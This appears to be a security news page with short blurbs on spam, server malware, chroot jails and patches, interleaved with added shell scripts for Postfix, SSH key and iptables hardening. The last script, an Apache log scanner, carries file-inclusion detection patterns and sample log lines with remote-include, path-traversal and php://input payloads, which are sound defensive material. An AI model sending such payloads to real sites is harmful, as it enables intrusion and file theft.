We have thousands of posts on a wide variety of open source and security topics, conveniently organized for searching or just browsing.
The last few weeks have seen a dramatic increase in spam (once again). Estimates now put spam at 80 to 90% of all email, many mail servers struggle with the additional load, and filters such as SpamAssassin no longer recognize as much of the latest spam as they used to. Fortunately, a large share of it can be blocked at the MTA level, for example with DNS blacklists and checks on the sender and recipient domains.
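As an added illustration of what MTA-level blocking looks like in practice (this is example code, not part of the article above): a Postfix restriction list that rejects the bulk of bot spam before SpamAssassin ever sees it. Postfix is assumed, since the article names no MTA, and the two blacklist names are placeholders for lists you have vetted yourself.

```shell
#!/bin/sh
# Reject spam at the MTA before it reaches SpamAssassin. Postfix is assumed
# here (the article does not name an MTA); zen.spamhaus.org and bl.spamcop.net
# are example DNS blacklists, substitute the lists you have vetted.
#
# Order matters: exempt your own clients and refuse open relaying first, then
# run the cheap syntax/DNS checks on the sender, and only then pay for a
# blacklist lookup. Putting reject_rbl_client first would reject your own
# authenticated roaming users, whose dynamic addresses are routinely listed,
# before permit_sasl_authenticated gets a chance to exempt them.
recipient_restrictions() {
    cat <<'EOF'
permit_mynetworks
permit_sasl_authenticated
reject_unauth_destination
reject_non_fqdn_sender
reject_non_fqdn_recipient
reject_unknown_sender_domain
reject_rbl_client zen.spamhaus.org
reject_rbl_client bl.spamcop.net
permit
EOF
}

# Render the list as a single main.cf value: "a, b, c".
restrictions_value() {
    recipient_restrictions | paste -s -d ',' - | sed 's/,/, /g'
}

# Apply to a live Postfix (needs root) and reload.
apply_restrictions() {
    postconf -e "smtpd_recipient_restrictions = $(restrictions_value)"
    postconf -e 'smtpd_helo_required = yes'      # bots often skip HELO
    postconf -e 'disable_vrfy_command = yes'     # no address harvesting via VRFY
    postfix reload
}

# Print the resulting main.cf line so it can be reviewed before applying.
echo "smtpd_recipient_restrictions = $(restrictions_value)"
```

Run it once without applying to see the main.cf line it would set; call `apply_restrictions` as root when you are happy with the order. Every `reject_*` check here is answered at RCPT TO time, so rejected mail never consumes a content-filter process.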
Web sites running Microsoft Corp.'s Web server software are twice as likely to be hosting malicious code as other Web sites, according to research from Google Inc. Last month, Google's Anti-Malware team looked at 70,000 domains that were either distributing malware or hosting attack code. "Compared to our sample of servers across the Internet, Microsoft IIS features twice as often as a malware-distributing server," wrote Google's Nagendra Modadugu, in a Tuesday blog posting.
Backing up files and directories is relatively easy; databases, however, have some special quirks that you need to address. Our examples use MySQL, but the same principles apply to PostgreSQL and other relational databases. This article is excerpted from O'Reilly's recently published book Linux System Administration.
Rootsh is a shell that logs everything a root user sees on the terminal. This is useful when more than one system administrator shares a server and you want a record of exactly what any given user did. Although the latest rootsh release dates from March 2005, it still does its job well. Bear in mind that anyone with root on the box can tamper with logs kept locally, so ship them to a syslog server elsewhere.
Late at night, a system administrator performed a routine check of a crashed server, one of 48 systems comprising a major online infrastructure that generated about $4 million per month in revenue. He was a bit surprised that the system had gone down, as it had been humming for months without any indication of being prone to crashing. The check uncovered three encrypted files. The administrator called on MANDIANT to analyze them.
Deployment of products that transform physical servers into "virtual machines" has resulted in nothing short of a data centre revolution. But virtualization of everything from operating systems to applications increasingly has critics asking: Where's the security? "Traffic is going from virtual machine to virtual machine," points out Neil MacDonald, vice president of research firm Gartner. "Where's the monitoring, the intrusion-detection and protection?"
A chroot jail changes the root directory that a process sees, so an administrator can isolate a service from the real filesystem. Exposed and sensitive network services should run in a chroot jail: if an attacker breaks into a vulnerable service, the compromise could otherwise extend to the whole system, whereas a jailed intruder sees only what you choose to expose, which should be nothing useful. Frequent targets that deserve jailing include BIND, Apache, FTP and SSH. Note that a chroot only confines a process that has also given up root privileges; a process still running as root inside the jail can break out of it. SSHjail is a patch for the OpenSSH daemon. It modifies two OpenSSH files (session.c and version.h) and lets you jail your SSH service without reconfiguring SSH.
It's about two and a half years since the standards bodies threw up their hands and left SMTP authentication to the industry. Implementation progress has been slow but positive, and there have been some surprises.
Companies in a rush to deploy virtualization technologies for server consolidation efforts could wind up overlooking many security issues and exposing themselves to risks, warns research firm Gartner.
Computer security is a precarious business both from a product development and administrative standpoint. Operating system vendors are forced to constantly patch their software to keep consumers protected from the latest digital threats. But which operating systems are the most secure? A recent report by Symantec hints that Windows currently presents fewer security holes than its commercial competitors.
NSA has developed and distributed configuration guidance for operating systems. These guides are currently used throughout the government and by numerous other organizations as a security baseline for their systems.
A security expert is warning database administrators about a continued loophole in database communication protocols that would allow an attacker to bypass access controls and gain access to critical files.
Last week I gave a few tips about SSH, so this week I think I will give a few tips about Apache. Just to reiterate, these are tips that have worked for me, and they may not be as efficient or as effective for your style of system administration.
Over the years, I have worked with many SSH boxes and had the pleasure of managing even more SSH keys. The problem is that the keys build up, and then you wonder which boxes have which keys in their authorized_keys file, and so on. Well, I can
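An added example, not from the article (whose text is cut off above): a small POSIX shell inventory that fingerprints every key in a set of authorized_keys files, one file per host, and reports which hosts trust each key. It assumes GNU coreutils for `base64` and `sha256sum`; the two key blobs in the built-in sample are constructed, truncated strings, not real public keys.

```shell
#!/bin/sh
# Inventory SSH public keys across hosts: one authorized_keys file per host,
# named <host>.keys, and one report line per distinct key listing the hosts
# that trust it. Assumes GNU coreutils (base64 -d, sha256sum).

# Hex SHA-256 of the decoded key blob. ssh-keygen -lf prints the same digest
# base64-encoded, so the two can be converted, but this form needs no OpenSSH.
key_fp() {
    printf '%s' "$1" | base64 -d 2>/dev/null | sha256sum | cut -c1-64
}

# "fingerprint host keytype comment" for each key in one file. Blank lines and
# comments are dropped and leading options (from=, command=, ...) stripped.
list_keys() {
    host=$1; file=$2
    sed -E -e '/^[[:space:]]*(#|$)/d' \
           -e 's/^.*(ssh-(rsa|dss|ed25519)|ecdsa-sha2-nistp[0-9]+) /\1 /' "$file" |
    while read -r ktype blob comment; do
        printf '%s %s %s %s\n' "$(key_fp "$blob")" "$host" "$ktype" "${comment:--}"
    done
}

# Group by fingerprint across all files given on the command line.
report_keys() {
    for f in "$@"; do
        list_keys "$(basename "$f" .keys)" "$f"
    done | sort | awk '
        { hosts[$1] = hosts[$1] " " $2; type[$1] = $3; comment[$1] = $4 }
        END { for (fp in hosts) printf "%s %s %s:%s\n", substr(fp, 1, 16), type[fp], comment[fp], hosts[fp] }' |
    sort
}

# Constructed sample: two hosts, one key shared between them. The blobs are
# syntactically valid base64 but truncated, not real keys.
make_sample_inventory() {
    dir=$1
    printf 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAAAgQDX alice@laptop\n' > "$dir/web1.keys"
    printf '# bob may only come from the admin host\n' > "$dir/db1.keys"
    printf 'from="10.0.0.5" ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIB3a4Vxu bob@desk\n' >> "$dir/db1.keys"
    printf 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAAAgQDX alice@laptop\n' >> "$dir/db1.keys"
}

# Demo: report on the constructed sample, or on the files given as arguments.
if [ "$#" -eq 0 ]; then
    tmp=$(mktemp -d); make_sample_inventory "$tmp"
    report_keys "$tmp"/*.keys
    rm -rf "$tmp"
else
    report_keys "$@"
fi
```

In real use, collect each host's `~root/.ssh/authorized_keys` into `<host>.keys` (scp or a config-management export) and run the script over the directory; any key that appears on a host it should not, or that no current staff member can account for, is a removal candidate. Grouping by fingerprint rather than by comment matters because the comment field is free text an attacker can set to anything.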
If you want to keep certain conveniences for yourself, such as leaving SSH open to root or keeping a machine with anonymous FTP access, take a slightly different approach to securing your environment (or those particular machines): layered security. Without changing the physical layout of your network, change its logical layout with iptables and/or TCP wrappers.
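An added example of the layered approach (example code, not from the article): iptables as the outer layer and TCP wrappers as the inner one, for a host that deliberately keeps root SSH login and anonymous FTP. The admin network 10.0.0.0/24, the daemon name vsftpd and the passive FTP port range are placeholders.

```shell
#!/bin/sh
# Layered restriction for a host that deliberately keeps root SSH login and
# anonymous FTP. Layer 1 (iptables) decides who can reach sshd at all;
# layer 2 (tcp_wrappers, hosts.allow) re-checks the source inside sshd, so a
# flushed firewall does not silently open root SSH to the world.
# Placeholders: admin network 10.0.0.0/24, vsftpd, passive FTP 30000-30100.

# The weak setting this replaces is a single open rule:
#   iptables -A INPUT -p tcp --dport 22 -j ACCEPT
# Here SSH is accepted only from the admin network. Commands are printed, not
# executed, so the ruleset can be reviewed or diffed first; pipe into sh to apply.
build_rules() {
    admin_net=${1:-10.0.0.0/24}
    cat <<EOF
iptables -F INPUT
iptables -P INPUT DROP
iptables -A INPUT -i lo -j ACCEPT
iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
iptables -A INPUT -p tcp --dport 22 -s $admin_net -j ACCEPT
iptables -A INPUT -p tcp --dport 21 -j ACCEPT
iptables -A INPUT -p tcp --dport 30000:30100 -j ACCEPT
iptables -A INPUT -p icmp --icmp-type echo-request -m limit --limit 5/s -j ACCEPT
iptables -A INPUT -m limit --limit 10/min -j LOG --log-prefix "INPUT-DROP: "
EOF
}

# tcp_wrappers understands net/mask, not CIDR, for IPv4, so convert the prefix.
cidr_to_mask() {
    bits=$1; mask=
    for octet in 1 2 3 4; do
        if [ "$bits" -ge 8 ]; then n=255; bits=$((bits - 8))
        else n=$(( (255 << (8 - bits)) & 255 )); bits=0; fi
        mask="$mask${mask:+.}$n"
    done
    echo "$mask"
}

# Same policy in /etc/hosts.allow syntax (hosts_access(5), hosts_options(5));
# ALL: ALL: DENY last, so anything not listed is refused even if hosts.deny is empty.
build_hosts_allow() {
    admin_net=${1:-10.0.0.0/24}
    cat <<EOF
sshd: ${admin_net%/*}/$(cidr_to_mask "${admin_net#*/}")
vsftpd: ALL
ALL: ALL: DENY
EOF
}

build_rules "$@"
echo '# ---- /etc/hosts.allow ----'
build_hosts_allow "$@"
```

Run it with your own admin prefix as the argument, review the output, then pipe the iptables part into `sh` and paste the hosts.allow part into `/etc/hosts.allow`. The default `INPUT DROP` policy, rather than a trailing DROP rule, is what makes a partially loaded ruleset fail closed.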
Nathan wrote in earlier with PHP file-inclusion attempts that his server had automatically thwarted. He's promoting the use of mod_security, mod_evasive, fail2ban and suhosin in an Apache/PHP environment. Since knowledge and experience are how you stay ahead of the bad guys, how about sharing your favorite setup for Apache/PHP security (basically a "LAMP" environment, although I'd rather not focus on the OS part) and we'll summarize on this page. Also let us know what you like about the components you use, why they are your favorite, and so on.
No doubt you're already aware of the standard logfiles that Apache httpd creates for you. There's the access log, which records every request made to your server, and the error log, which notes every time something goes wrong or something of interest happens that you should know about. There are a few things you can do to make your access log more useful, such as using the combined rather than the common logfile format; but that's another article. See the documentation for mod_log_config for more information on that.
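Tying the two items above together, here is an added example (not from either article or from the fail2ban project) of the detection side of Nathan's setup run over Apache access-log lines: it flags PHP file-inclusion probes and lists the clients that would cross a fail2ban-style maxretry threshold. It also shows why the combined format is worth having, since the user agent it adds is what exposes the scanning tool. The sample log is constructed, uses RFC 5737 documentation addresses, and the URI patterns are this example's assumptions rather than a published ruleset.

```shell
#!/bin/sh
# Find PHP file-inclusion probes in an Apache access log and list the clients
# that would cross a fail2ban-style maxretry threshold. Works on the "combined"
# format (referer and user agent present) and degrades to "common" (user agent
# reported as "-"). The sample log is constructed for this example, with
# RFC 5737 documentation addresses; the URI patterns are assumptions, not a
# published ruleset.

# Print "client-ip uri user-agent" for requests whose query string carries a
# remote URL (=http://...), a directory traversal (../), or a PHP stream wrapper.
inclusion_attempts() {
    awk '
    {
        n = split($0, q, "\"")     # q[2] = request line; q[6] = user agent if combined
        split(q[2], r, " ")        # r[1] = method, r[2] = URI
        uri = tolower(r[2])
        if (uri ~ /=(https?|ftp):\/\// ||
            uri ~ /(\.\.\/|%2e%2e(%2f|\/))/ ||
            uri ~ /(php|data|expect):\/\//)
            printf "%s %s %s\n", $1, r[2], (n >= 6 ? q[6] : "-")
    }' "$@"
}

# Addresses with at least MAXRETRY matching requests: what fail2ban would ban.
ban_candidates() {
    maxretry=$1; shift
    inclusion_attempts "$@" | awk -v max="$maxretry" '
        { hits[$1]++ }
        END { for (ip in hits) if (hits[ip] >= max) print ip }' | sort
}

# Constructed sample log (combined format). The last line shows why a single
# "=http://" hit should not ban on its own: a legitimate parameter can carry a URL.
sample_log() {
    cat <<'EOF'
203.0.113.7 - - [12/Mar/2007:03:14:15 +0000] "GET /index.php?page=http://203.0.113.9/cmd.txt? HTTP/1.1" 200 512 "-" "libwww-perl/5.805"
203.0.113.7 - - [12/Mar/2007:03:14:16 +0000] "GET /index.php?page=../../../../etc/passwd HTTP/1.1" 404 209 "-" "libwww-perl/5.805"
198.51.100.2 - - [12/Mar/2007:03:15:01 +0000] "GET /index.php?page=about HTTP/1.1" 200 2048 "http://www.example.com/" "Mozilla/5.0"
203.0.113.7 - - [12/Mar/2007:03:15:30 +0000] "GET /index.php?page=php://input HTTP/1.1" 200 512 "-" "libwww-perl/5.805"
198.51.100.2 - - [12/Mar/2007:03:16:00 +0000] "GET /news.php?id=http://www.example.com/logo.png HTTP/1.1" 200 100 "-" "Mozilla/5.0"
EOF
}

# Demo on the sample, or on the log files given as arguments (maxretry 3).
if [ "$#" -eq 0 ]; then
    tmp=$(mktemp); sample_log > "$tmp"
    inclusion_attempts "$tmp"
    echo '# ban candidates:'; ban_candidates 3 "$tmp"
    rm -f "$tmp"
else
    ban_candidates 3 "$@"
fi
```

On the sample, 203.0.113.7 trips all three patterns from a libwww-perl client and is the only ban candidate; 198.51.100.2 matches once on a harmless URL parameter and stays below the threshold, which is the same trade-off fail2ban's `maxretry` makes. Feed it `/var/log/apache2/access.log` (or your vhost log) to try it on real traffic; mod_security, suhosin and the like are the blocking layers in front of this, and this kind of log review is how you confirm they are earning their keep.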
Sun Microsystems has issued a security update for computers running the Sun Solaris 10 operating system. The update patches a vulnerability in which a single malformed ICMP request can cause a kernel panic. The vendor does not disclose the conditions required for the attack to succeed, but in its security advisory Sun suggests testing whether a system responds to ICMP echo requests with an ordinary ping utility.
The recent surge in malware attacks against zero-day flaws in some of the most widely used software packages confirms an IT administrator's worst nightmare: stand-alone, signature-based anti-virus software offers no protection from sophisticated online criminals. During 2006, there was a wave of zero-day attacks against Microsoft Office applications